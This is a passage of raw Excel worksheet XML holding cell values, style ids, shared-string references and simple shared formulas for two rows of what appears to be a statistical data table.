        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU46" s="110">
        <f t="shared" si="30"/>
        <v>0.03773584906</v>
      </c>
      <c r="EV46" s="110">
        <f t="shared" si="31"/>
        <v>0.03773584906</v>
      </c>
      <c r="EW46" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX46" s="110">
        <f t="shared" si="33"/>
        <v>0.03773584906</v>
      </c>
      <c r="EY46" s="110">
        <f t="shared" si="34"/>
        <v>0.03773584906</v>
      </c>
      <c r="EZ46" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA46" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB46" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC46" s="111" t="s">
        <v>984</v>
      </c>
      <c r="FD46" s="111">
        <v>5.0</v>
      </c>
      <c r="FE46" s="111">
        <v>20.0</v>
      </c>
      <c r="FF46" s="101" t="s">
        <v>985</v>
      </c>
      <c r="FG46" s="111">
        <v>1917.0</v>
      </c>
      <c r="FH46" s="111">
        <v>1.0</v>
      </c>
      <c r="FI46" s="111">
        <v>8.0</v>
      </c>
      <c r="FJ46" s="111" t="s">
        <v>984</v>
      </c>
      <c r="FK46" s="111" t="s">
        <v>985</v>
      </c>
      <c r="FL46" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FM46" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN46" s="111" t="s">
        <v>984</v>
      </c>
      <c r="FO46" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP46" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ46" s="111">
        <v>0.0</v>
      </c>
      <c r="FR46" s="111">
        <v>0.0</v>
      </c>
      <c r="FS46" s="112">
        <v>214.0</v>
      </c>
      <c r="FT46" s="112">
        <v>3.0</v>
      </c>
      <c r="FU46" s="112">
        <v>10.0</v>
      </c>
      <c r="FV46" s="112">
        <v>8.0</v>
      </c>
      <c r="FW46" s="112">
        <v>12.0</v>
      </c>
      <c r="FX46" s="112">
        <v>12.0</v>
      </c>
      <c r="FY46" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ46" s="112">
        <v>0.0</v>
      </c>
      <c r="GA46" s="112">
        <v>0.0</v>
      </c>
      <c r="GB46" s="112">
        <v>0.0</v>
      </c>
      <c r="GC46" s="112">
        <v>2.0</v>
      </c>
      <c r="GD46" s="112">
        <v>8.0</v>
      </c>
      <c r="GE46" s="112">
        <v>8.0</v>
      </c>
      <c r="GF46" s="112">
        <v>0.0</v>
      </c>
      <c r="GG46" s="112">
        <v>8.0</v>
      </c>
      <c r="GH46" s="113">
        <f t="shared" si="39"/>
        <v>0.0141509434</v>
      </c>
      <c r="GI46" s="113">
        <f t="shared" si="40"/>
        <v>0.009433962264</v>
      </c>
      <c r="GJ46" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK46" s="113">
        <f t="shared" si="42"/>
        <v>0.04716981132</v>
      </c>
      <c r="GL46" s="113">
        <f t="shared" si="43"/>
        <v>0.03773584906</v>
      </c>
      <c r="GM46" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN46" s="113">
        <f t="shared" si="45"/>
        <v>0.05660377358</v>
      </c>
      <c r="GO46" s="113">
        <f t="shared" si="46"/>
        <v>0.03773584906</v>
      </c>
      <c r="GP46" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ46" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR46" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS46" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT46" s="94" t="s">
        <v>986</v>
      </c>
      <c r="GU46" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV46" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW46" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX46" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY46" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ46" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA46" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB46" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC46" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD46" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE46" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF46" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG46" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH46" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI46" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ46" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK46" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL46" s="93">
        <v>217.0</v>
      </c>
      <c r="HM46" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN46" s="93">
        <v>0.0</v>
      </c>
      <c r="HO46" s="93">
        <v>0.0</v>
      </c>
      <c r="HP46" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ46" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR46" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS46" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT46" s="139" t="s">
        <v>987</v>
      </c>
      <c r="HU46" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV46" s="119">
        <v>9999.0</v>
      </c>
      <c r="HW46" s="119">
        <v>1.0</v>
      </c>
      <c r="HX46" s="119">
        <v>212.0</v>
      </c>
      <c r="HY46" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ46" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA46" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB46" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC46" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID46" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE46" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF46" s="120">
        <v>9999.0</v>
      </c>
      <c r="IG46" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH46" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II46" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ46" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK46" s="99">
        <v>212.0</v>
      </c>
      <c r="IL46" s="99">
        <v>0.0</v>
      </c>
      <c r="IM46" s="121">
        <f t="shared" si="93"/>
        <v>212</v>
      </c>
      <c r="IN46" s="122" t="s">
        <v>988</v>
      </c>
      <c r="IO46" s="98">
        <v>212.0</v>
      </c>
      <c r="IP46" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ46" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR46" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS46" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT46" s="127"/>
      <c r="IU46" s="127"/>
      <c r="IV46" s="127"/>
      <c r="IW46" s="127"/>
      <c r="IX46" s="127"/>
      <c r="IY46" s="127"/>
      <c r="IZ46" s="127"/>
      <c r="JA46" s="127"/>
      <c r="JB46" s="127"/>
      <c r="JC46" s="127"/>
      <c r="JD46" s="127"/>
      <c r="JE46" s="127"/>
      <c r="JF46" s="127"/>
      <c r="JG46" s="127"/>
      <c r="JH46" s="127"/>
      <c r="JI46" s="127"/>
      <c r="JJ46" s="127"/>
      <c r="JK46" s="127"/>
      <c r="JL46" s="127"/>
      <c r="JM46" s="127"/>
      <c r="JN46" s="127"/>
      <c r="JO46" s="127"/>
      <c r="JP46" s="127"/>
      <c r="JQ46" s="127"/>
      <c r="JR46" s="127"/>
      <c r="JS46" s="127"/>
      <c r="JT46" s="127"/>
      <c r="JU46" s="127"/>
      <c r="JV46" s="127"/>
      <c r="JW46" s="127"/>
      <c r="JX46" s="127"/>
      <c r="JY46" s="127"/>
      <c r="JZ46" s="127"/>
      <c r="KA46" s="127"/>
      <c r="KB46" s="127"/>
      <c r="KC46" s="127"/>
      <c r="KD46" s="127"/>
      <c r="KE46" s="127"/>
      <c r="KF46" s="127"/>
      <c r="KG46" s="127"/>
      <c r="KH46" s="127"/>
      <c r="KI46" s="127"/>
      <c r="KJ46" s="127"/>
      <c r="KK46" s="127"/>
      <c r="KL46" s="127"/>
      <c r="KM46" s="127"/>
      <c r="KN46" s="127"/>
      <c r="KO46" s="127"/>
      <c r="KP46" s="127"/>
      <c r="KQ46" s="127"/>
      <c r="KR46" s="127"/>
      <c r="KS46" s="127"/>
      <c r="KT46" s="127"/>
      <c r="KU46" s="127"/>
      <c r="KV46" s="127"/>
      <c r="KW46" s="127"/>
      <c r="KX46" s="127"/>
      <c r="KY46" s="127"/>
      <c r="KZ46" s="127"/>
      <c r="LA46" s="127"/>
      <c r="LB46" s="127"/>
      <c r="LC46" s="127"/>
      <c r="LD46" s="127"/>
      <c r="LE46" s="127"/>
      <c r="LF46" s="127"/>
      <c r="LG46" s="127"/>
      <c r="LH46" s="127"/>
      <c r="LI46" s="127"/>
      <c r="LJ46" s="127"/>
      <c r="LK46" s="127"/>
      <c r="LL46" s="127"/>
      <c r="LM46" s="127"/>
      <c r="LN46" s="127"/>
      <c r="LO46" s="127"/>
      <c r="LP46" s="127"/>
      <c r="LQ46" s="127"/>
      <c r="LR46" s="127"/>
      <c r="LS46" s="127"/>
      <c r="LT46" s="127"/>
      <c r="LU46" s="127"/>
      <c r="LV46" s="127"/>
      <c r="LW46" s="127"/>
      <c r="LX46" s="127"/>
      <c r="LY46" s="127"/>
      <c r="LZ46" s="127"/>
      <c r="MA46" s="127"/>
      <c r="MB46" s="127"/>
      <c r="MC46" s="127"/>
      <c r="MD46" s="127"/>
      <c r="ME46" s="127"/>
      <c r="MF46" s="127"/>
      <c r="MG46" s="127"/>
      <c r="MH46" s="127"/>
      <c r="MI46" s="127"/>
      <c r="MJ46" s="127"/>
      <c r="MK46" s="127"/>
      <c r="ML46" s="127"/>
      <c r="MM46" s="127"/>
      <c r="MN46" s="127"/>
      <c r="MO46" s="127"/>
      <c r="MP46" s="127"/>
      <c r="MQ46" s="127"/>
      <c r="MR46" s="127"/>
      <c r="MS46" s="127"/>
      <c r="MT46" s="127"/>
      <c r="MU46" s="127"/>
      <c r="MV46" s="127"/>
      <c r="MW46" s="127"/>
      <c r="MX46" s="127"/>
      <c r="MY46" s="127"/>
      <c r="MZ46" s="127"/>
      <c r="NA46" s="127"/>
      <c r="NB46" s="127"/>
      <c r="NC46" s="127"/>
      <c r="ND46" s="127"/>
      <c r="NE46" s="127"/>
      <c r="NF46" s="127"/>
      <c r="NG46" s="127"/>
      <c r="NH46" s="127"/>
      <c r="NI46" s="127"/>
      <c r="NJ46" s="127"/>
      <c r="NK46" s="127"/>
      <c r="NL46" s="127"/>
      <c r="NM46" s="127"/>
      <c r="NN46" s="127"/>
      <c r="NO46" s="127"/>
      <c r="NP46" s="127"/>
      <c r="NQ46" s="127"/>
      <c r="NR46" s="127"/>
      <c r="NS46" s="127"/>
      <c r="NT46" s="127"/>
      <c r="NU46" s="127"/>
      <c r="NV46" s="127"/>
      <c r="NW46" s="127"/>
      <c r="NX46" s="127"/>
      <c r="NY46" s="127"/>
    </row>
    <row r="47" ht="194.25" customHeight="1">
      <c r="B47" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C47" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D47" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E47" s="90" t="s">
        <v>989</v>
      </c>
      <c r="F47" s="90" t="s">
        <v>990</v>
      </c>
      <c r="G47" s="91" t="s">
        <v>12</v>
      </c>
      <c r="H47" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I47" s="92" t="s">
        <v>991</v>
      </c>
      <c r="J47" s="92" t="s">
        <v>992</v>
      </c>
      <c r="K47" s="92" t="s">
        <v>993</v>
      </c>
      <c r="L47" s="93" t="s">
        <v>267</v>
      </c>
      <c r="M47" s="93">
        <v>8.0</v>
      </c>
      <c r="N47" s="93">
        <v>1.0</v>
      </c>
      <c r="O47" s="93">
        <v>0.0</v>
      </c>
      <c r="P47" s="93">
        <v>1.0</v>
      </c>
      <c r="Q47" s="93">
        <f t="shared" si="94"/>
        <v>3</v>
      </c>
      <c r="R47" s="93">
        <v>3.0</v>
      </c>
      <c r="S47" s="93">
        <v>0.0</v>
      </c>
      <c r="T47" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U47" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V47" s="96" t="s">
        <v>994</v>
      </c>
      <c r="W47" s="96" t="s">
        <v>995</v>
      </c>
      <c r="X47" s="126" t="s">
        <v>996</v>
      </c>
      <c r="Y47" s="126" t="s">
        <v>997</v>
      </c>
      <c r="Z47" s="132" t="s">
        <v>998</v>
      </c>
      <c r="AA47" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB47" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC47" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD47" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE47" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF47" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG47" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH47" s="99" t="s">
        <v>999</v>
      </c>
      <c r="AI47" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ47" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK47" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL47" s="100">
        <v>0.0</v>
      </c>
      <c r="AM47" s="100">
        <v>0.0</v>
      </c>
      <c r="AN47" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO47" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP47" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ47" s="100">
        <v>0.0</v>
      </c>
      <c r="AR47" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS47" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT47" s="100" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AU47" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV47" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW47" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX47" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY47" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ47" s="100">
        <v>0.0</v>
      </c>
      <c r="BA47" s="102">
        <v>8.0</v>
      </c>
      <c r="BB47" s="102">
        <v>0.0</v>
      </c>
      <c r="BC47" s="102">
        <v>0.0</v>
      </c>
      <c r="BD47" s="102">
        <v>0.0</v>
      </c>
      <c r="BE47" s="102">
        <v>0.0</v>
      </c>
      <c r="BF47" s="102">
        <v>0.0</v>
      </c>
      <c r="BG47" s="102">
        <v>0.0</v>
      </c>
      <c r="BH47" s="102">
        <v>0.0</v>
      </c>
      <c r="BI47" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ47" s="102">
        <v>0.0</v>
      </c>
      <c r="BK47" s="102">
        <v>0.0</v>
      </c>
      <c r="BL47" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM47" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN47" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO47" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP47" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ47" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR47" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS47" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT47" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU47" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV47" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW47" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX47" s="104">
        <v>0.0</v>
      </c>
      <c r="BY47" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ47" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA47" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CB47" s="104">
        <v>0.0</v>
      </c>
      <c r="CC47" s="104">
        <v>0.0</v>
      </c>
      <c r="CD47" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CE47" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CF47" s="104" t="str">
        <f t="shared" si="90"/>
        <v>-</v>
      </c>
      <c r="CG47" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CH47" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CI47" s="128" t="s">
        <v>12</v>
      </c>
      <c r="CJ47" s="128" t="s">
        <v>12</v>
      </c>
      <c r="CK47" s="104">
        <v>0.0</v>
      </c>
      <c r="CL47" s="104">
        <v>0.0</v>
      </c>
      <c r="CM47" s="105">
        <v>8.0</v>
      </c>
      <c r="CN47" s="105">
        <v>0.0</v>
      </c>
      <c r="CO47" s="105">
        <v>0.0</v>
      </c>
      <c r="CP47" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ47" s="105">
        <v>0.0</v>
      </c>
      <c r="CR47" s="105">
        <v>0.0</v>
      </c>
      <c r="CS47" s="105">
        <v>0.0</v>
      </c>
      <c r="CT47" s="105">
        <v>0.0</v>
      </c>
      <c r="CU47" s="105">
        <v>0.0</v>
      </c>
      <c r="CV47" s="105">
        <v>0.0</v>
      </c>
      <c r="CW47" s="105">
        <v>0.0</v>
      </c>
      <c r="CX47" s="105">
        <v>0.0</v>
      </c>
      <c r="CY47" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ47" s="105">
        <v>0.0</v>
      </c>
      <c r="DA47" s="105">
        <v>0.0</v>
      </c>
      <c r="DB47" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC47" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD47" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE47" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF47" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG47" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH47" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI47" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ47" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK47" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL47" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM47" s="108" t="s">
        <v>1000</v>
      </c>
      <c r="DN47" s="108">
        <v>3.0</v>
      </c>
      <c r="DO47" s="108">
        <v>6.0</v>
      </c>
      <c r="DP47" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ47" s="108" t="s">
        <v>1000</v>
      </c>
      <c r="DR47" s="108">
        <v>3.0</v>
      </c>
      <c r="DS47" s="108">
        <v>6.0</v>
      </c>
      <c r="DT47" s="108" t="s">
        <v>1000</v>
      </c>
      <c r="DU47" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV47" s="108" t="str">
        <f t="shared" si="91"/>
        <v>44486, 44484, 44488</v>
      </c>
      <c r="DW47" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX47" s="108" t="s">
        <v>1000</v>
      </c>
      <c r="DY47" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ47" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA47" s="108">
        <v>0.0</v>
      </c>
      <c r="EB47" s="108">
        <v>0.0</v>
      </c>
      <c r="EC47" s="109">
        <v>8.0</v>
      </c>
      <c r="ED47" s="109">
        <v>2.0</v>
      </c>
      <c r="EE47" s="109">
        <v>2.0</v>
      </c>
      <c r="EF47" s="109">
        <v>6.0</v>
      </c>
      <c r="EG47" s="109">
        <v>0.0</v>
      </c>
      <c r="EH47" s="109">
        <v>6.0</v>
      </c>
      <c r="EI47" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ47" s="109">
        <v>0.0</v>
      </c>
      <c r="EK47" s="109">
        <v>0.0</v>
      </c>
      <c r="EL47" s="109">
        <v>0.0</v>
      </c>
      <c r="EM47" s="109">
        <v>2.0</v>
      </c>
      <c r="EN47" s="109">
        <v>2.0</v>
      </c>
      <c r="EO47" s="109">
        <v>6.0</v>
      </c>
      <c r="EP47" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ47" s="109">
        <v>6.0</v>
      </c>
      <c r="ER47" s="110">
        <f t="shared" si="27"/>
        <v>2</v>
      </c>
      <c r="ES47" s="110">
        <f t="shared" si="28"/>
        <v>2</v>
      </c>
      <c r="ET47" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU47" s="110">
        <f t="shared" si="30"/>
        <v>2</v>
      </c>
      <c r="EV47" s="110">
        <f t="shared" si="31"/>
        <v>2</v>
      </c>
      <c r="EW47" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX47" s="110">
        <f t="shared" si="33"/>
        <v>2</v>
      </c>
      <c r="EY47" s="110">
        <f t="shared" si="34"/>
        <v>2</v>
      </c>
      <c r="EZ47" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA47" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB47" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC47" s="111" t="s">
        <v>1001</v>
      </c>
      <c r="FD47" s="111">
        <v>5.0</v>
      </c>
      <c r="FE47" s="111">
        <v>8.0</v>
      </c>
      <c r="FF47" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG47" s="111" t="s">
        <v>1000</v>
      </c>
      <c r="FH47" s="111">
        <v>3.0</v>
      </c>
      <c r="FI47" s="111">
        <v>6.0</v>
      </c>
      <c r="FJ47" s="111" t="s">
        <v>1002</v>
      </c>
      <c r="FK47" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL47" s="111" t="str">
        <f t="shared" ref="FL47:FL76" si="95">IF(FJ47="-",FK47,FJ47)</f>
        <v>2002752, 2002749, 44486, 44484, 44488</v>
      </c>
      <c r="FM47" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN47" s="111" t="s">
        <v>1003</v>
      </c>
      <c r="FO47" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP47" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ47" s="111">
        <v>0.0</v>
      </c>
      <c r="FR47" s="111">
        <v>0.0</v>
      </c>
      <c r="FS47" s="112">
        <v>8.0</v>
      </c>
      <c r="FT47" s="112">
        <v>3.0</v>
      </c>
      <c r="FU47" s="112">
        <v>3.0</v>
      </c>
      <c r="FV47" s="112">
        <v>6.0</v>
      </c>
      <c r="FW47" s="112">
        <v>2.0</v>
      </c>
      <c r="FX47" s="112">
        <v>8.0</v>
      </c>
      <c r="FY47" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ47" s="112">
        <v>0.0</v>
      </c>
      <c r="GA47" s="112">
        <v>0.0</v>
      </c>
      <c r="GB47" s="112">
        <v>0.0</v>
      </c>
      <c r="GC47" s="112">
        <v>2.0</v>
      </c>
      <c r="GD47" s="112">
        <v>2.0</v>
      </c>
      <c r="GE47" s="112">
        <v>6.0</v>
      </c>
      <c r="GF47" s="112">
        <v>0.0</v>
      </c>
      <c r="GG47" s="112">
        <v>6.0</v>
      </c>
      <c r="GH47" s="113">
        <f t="shared" si="39"/>
        <v>3</v>
      </c>
      <c r="GI47" s="113">
        <f t="shared" si="40"/>
        <v>2</v>
      </c>
      <c r="GJ47" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK47" s="113">
        <f t="shared" si="42"/>
        <v>3</v>
      </c>
      <c r="GL47" s="113">
        <f t="shared" si="43"/>
        <v>2</v>
      </c>
      <c r="GM47" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN47" s="113">
        <f t="shared" si="45"/>
        <v>2.666666667</v>
      </c>
      <c r="GO47" s="113">
        <f t="shared" si="46"/>
        <v>2</v>
      </c>
      <c r="GP47" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ47" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR47" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS47" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT47" s="94" t="s">
        <v>1004</v>
      </c>
      <c r="GU47" s="116">
        <v>12090.0</v>
      </c>
      <c r="GV47" s="116">
        <v>1.0</v>
      </c>
      <c r="GW47" s="116">
        <v>5.0</v>
      </c>
      <c r="GX47" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY47" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ47" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA47" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB47" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC47" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD47" s="131">
        <v>12090.0</v>
      </c>
      <c r="HE47" s="131">
        <v>12090.0</v>
      </c>
      <c r="HF47" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG47" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH47" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI47" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ47" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK47" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL47" s="93">
        <v>7.0</v>
      </c>
      <c r="HM47" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN47" s="93">
        <v>1.0</v>
      </c>
      <c r="HO47" s="93">
        <v>0.0</v>
      </c>
      <c r="HP47" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ47" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR47" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS47" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT47" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU47" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV47" s="119" t="s">
        <v>1005</v>
      </c>
      <c r="HW47" s="119">
        <v>2.0</v>
      </c>
      <c r="HX47" s="119">
        <v>10.0</v>
      </c>
      <c r="HY47" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ47" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA47" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB47" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC47" s="120" t="str">
        <f t="shared" ref="IC47:IC48" si="96">HV47</f>
        <v>92322, 31696</v>
      </c>
      <c r="ID47" s="120">
        <v>31696.0</v>
      </c>
      <c r="IE47" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF47" s="120">
        <v>92322.0</v>
      </c>
      <c r="IG47" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH47" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II47" s="99" t="s">
        <v>1006</v>
      </c>
      <c r="IJ47" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK47" s="99">
        <v>5.0</v>
      </c>
      <c r="IL47" s="99">
        <v>1.0</v>
      </c>
      <c r="IM47" s="121">
        <f t="shared" si="93"/>
        <v>1</v>
      </c>
      <c r="IN47" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO47" s="98">
        <v>1.0</v>
      </c>
      <c r="IP47" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ47" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR47" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS47" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT47" s="127"/>
      <c r="IU47" s="127"/>
      <c r="IV47" s="127"/>
      <c r="IW47" s="127"/>
      <c r="IX47" s="127"/>
      <c r="IY47" s="127"/>
      <c r="IZ47" s="127"/>
      <c r="JA47" s="127"/>
      <c r="JB47" s="127"/>
      <c r="JC47" s="127"/>
      <c r="JD47" s="127"/>
      <c r="JE47" s="127"/>
      <c r="JF47" s="127"/>
      <c r="JG47" s="127"/>
      <c r="JH47" s="127"/>
      <c r="JI47" s="127"/>
      <c r="JJ47" s="127"/>
      <c r="JK47" s="127"/>
      <c r="JL47" s="127"/>
      <c r="JM47" s="127"/>
      <c r="JN47" s="127"/>
      <c r="JO47" s="127"/>
      <c r="JP47" s="127"/>
      <c r="JQ47" s="127"/>
      <c r="JR47" s="127"/>
      <c r="JS47" s="127"/>
      <c r="JT47" s="127"/>
